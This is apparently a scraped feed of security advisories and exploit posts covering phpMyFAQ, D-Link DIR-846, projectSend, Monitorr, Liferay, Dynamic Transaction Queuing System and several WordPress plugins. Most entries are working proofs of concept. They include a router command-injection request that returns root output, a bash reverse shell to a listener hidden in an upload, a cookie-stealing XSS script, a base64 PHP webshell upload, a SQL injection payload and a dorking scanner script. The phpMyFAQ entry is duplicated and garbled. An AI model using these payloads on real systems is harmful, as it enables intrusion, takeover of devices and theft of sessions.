Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

**Impact**

Hello,

After mitigation of all submitted XSS Vulnerabilities i was able to detect another XSS and bypass the XSS Filters in the FAQ Site while generating an HTML Export.

Lets see :)

This is th XSS Paylaod with XSS Ahmed 2

Only XSS Ahmed 2 will work !

Now lets export in in HTML5 and open the file the xss alert will be fired.

As you can see this is the XSS Payload lets refresh its stored

Thank you for watching :)

CVE-2023-1756: stored XSS after XSS Filter Bypass through exporting an HTML-Document in phpmyfaq

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

projectSend r1605 suffers from a remote code execution vulnerability.

Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs:  rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC  
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port   
 nc -lvp 4444

 3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"

openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"

0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"

1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"

34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"

openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"

------WebKitFormBoundaryc8btjvyb3An7HcmA--

And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce

private youtube video poc : https://youtu.be/Ln7KluDfnk4

projectSend r1605 Remote Code Execution

Monitorr version 1.7.6 suffers from a cross site scripting vulnerability.

    # Exploit Title: Monitorr v1.7.6 - Cross Site Scripting# CVE: CVE-2023-26776# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>The injected script tag is executed everytime the home page is loaded.

Monitorr 1.7.6 Cross Site Scripting

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

**Liferay Portal 6.2.5 Insecure Permissions**

Posted Apr 5, 2023

Authored by fu2x2000

Liferay Portal version 6.2.5 suffers from an insecure permissions vulnerability.

tags | exploit

advisories | CVE-2021-33990

SHA-256 | e3e411dfd9f5109ca37b6290d45f0e2d70ef14dec30d730427fdf7979b0850b5

Download | Favorite | View

**Liferay Portal 6.2.5 Insecure Permissions**

    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/# Date: 2021/05# Exploit Author: fu2x2000# Version: Liferay Portal 6.2.5 or later# CVE : CVE-2021-33990 import requestsimport jsonprint (" Search this on Google #Dork for liferay-inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")url ="URL Goes Here/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"req = requests.get(url)print reqsta = req.status_codeif sta == 200:print ('Life Vulnerability exists')cook = urlprint cookinject = "Command=FileUpload&Type=File&CurrentFolder=/"#cook_inject = cook+inject#print cook_injectelse:print ('not found try a another method')print ("solution restrict access and user groups")

**File Tags**

*   ActiveX (932)
*   Advisory (80,663)
*   Arbitrary (15,931)
*   BBS (2,859)
*   Bypass (1,655)
*   CGI (1,022)
*   Code Execution (7,067)
*   Conference (677)
*   Cracker (840)
*   CSRF (3,307)
*   DoS (22,956)
*   Encryption (2,359)
*   Exploit (50,803)
*   File Inclusion (4,186)
*   File Upload (951)
*   Firewall (821)
*   Info Disclosure (2,691)
*   Intrusion Detection (876)
*   Java (2,961)
*   JavaScript (831)
*   Kernel (6,471)
*   Local (14,314)
*   Magazine (586)
*   Overflow (12,549)
*   Perl (1,419)
*   PHP (5,111)
*   Proof of Concept (2,297)
*   Protocol (3,505)
*   Python (1,488)
*   Remote (30,329)
*   Root (3,538)
*   Rootkit (502)
*   Ruby (603)
*   Scanner (1,633)
*   Security Tool (7,825)
*   Shell (3,138)
*   Shellcode (1,209)
*   Sniffer (890)
*   Spoof (2,182)
*   SQL Injection (16,180)
*   TCP (2,385)
*   Trojan (687)
*   UDP (881)
*   Virus (663)
*   Vulnerability (31,400)
*   Web (9,473)
*   Whitepaper (3,740)
*   x86 (948)
*   XSS (17,599)
*   Other

**File Archives**

*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,960)
*   BSD (372)
*   CentOS (56)
*   Cisco (1,919)
*   Debian (6,715)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (340)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,194)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (12,962)
*   Slackware (941)
*   Solaris (1,609)
*   SUSE (1,444)
*   Ubuntu (8,470)
*   UNIX (9,209)
*   UnixWare (185)
*   Windows (6,534)
*   Other

Liferay Portal 6.2.5 Insecure Permissions

The YourChannel plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the deleteLang function. This makes it possible for unauthenticated attackers to reset the plugin's quick language translation settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-1871: YourChannel.php in yourchannel/trunk – WordPress Plugin Repository

An arbitrary file upload vulnerability in /admin/ajax.php?action=save_uploads of Dynamic Transaction Queuing System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

Cannot retrieve contributors at this time

**Dynamic Transaction Queuing System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: ctg503 team

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin/admin123 (Super Admin account)

Vulnerability url: ip/queuing/admin/ajax.php?action=save\_uploads

Loophole location: Dynamic Transaction Queuing System's "/queuing/admin/ajax.php?action=save\_uploads" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /queuing/admin/ajax.php?action\=save\_uploads HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/queuing/admin/index.php?page=uploads
Content-Length: 396
Content-Type: multipart/form-data; boundary=---------------------------208633099825036
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
\-----------------------------208633099825036
Content-Disposition: form-data; name="id"
\-----------------------------208633099825036
Content-Disposition: form-data; name="img\[\]"
data:image/php;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
\-----------------------------208633099825036
Content-Disposition: form-data; name="imgName\[\]"
shell.php
\-----------------------------208633099825036--

The files will be uploaded to this directory \\queuing\\admin\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-26857: bug_report/RCE-1.md at main · ctg503/bug_report

Dynamic Transaction Queuing System v1.0 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/ajax.php?action=login.

Permalink

**Dynamic Transaction Queuing System v1.0 by oretnom23 has SQL injection**

BUG\_Author: ctg503 team

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14479/dynamic-transaction-queuing-system-using-phpmysql-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /queuing/admin/ajax.php?action=login

Vulnerability location: /queuing/admin/ajax.php?action=login, name

dbname =queuing\_db

\[+\] Payload: username=admin' and sleep(5)--+&password=admin // Leak place ---> name

POST /queuing/admin/ajax.php?action\=login HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=t4551shae3529036q2g0j8luub
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
username=admin' and sleep(5)--+&password=admin

CVE-2023-26856: bug_report/SQLi-1.md at main · ctg503/bug_report

A vulnerability, which was classified as problematic, has been found in BestWebSoft Contact Form Plugin 3.51. Affected by this issue is the function cntctfrm_display_form/cntctfrm_check_form of the file contact_form.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.52 is able to address this issue. The name of the patch is 642ef1dc1751ab6642ce981fe126325bb574f898. It is recommended to upgrade the affected component. VDB-225002 is the identifier assigned to this vulnerability.

CVE-2013-10022

A vulnerability was found in SourceCodester Earnings and Expense Tracker App 1.0. It has been classified as problematic. This affects an unknown part of the file index.php. The manipulation of the argument page leads to information disclosure. It is possible to initiate the attack remotely. The identifier VDB-224997 was assigned to this vulnerability.

Tag

#php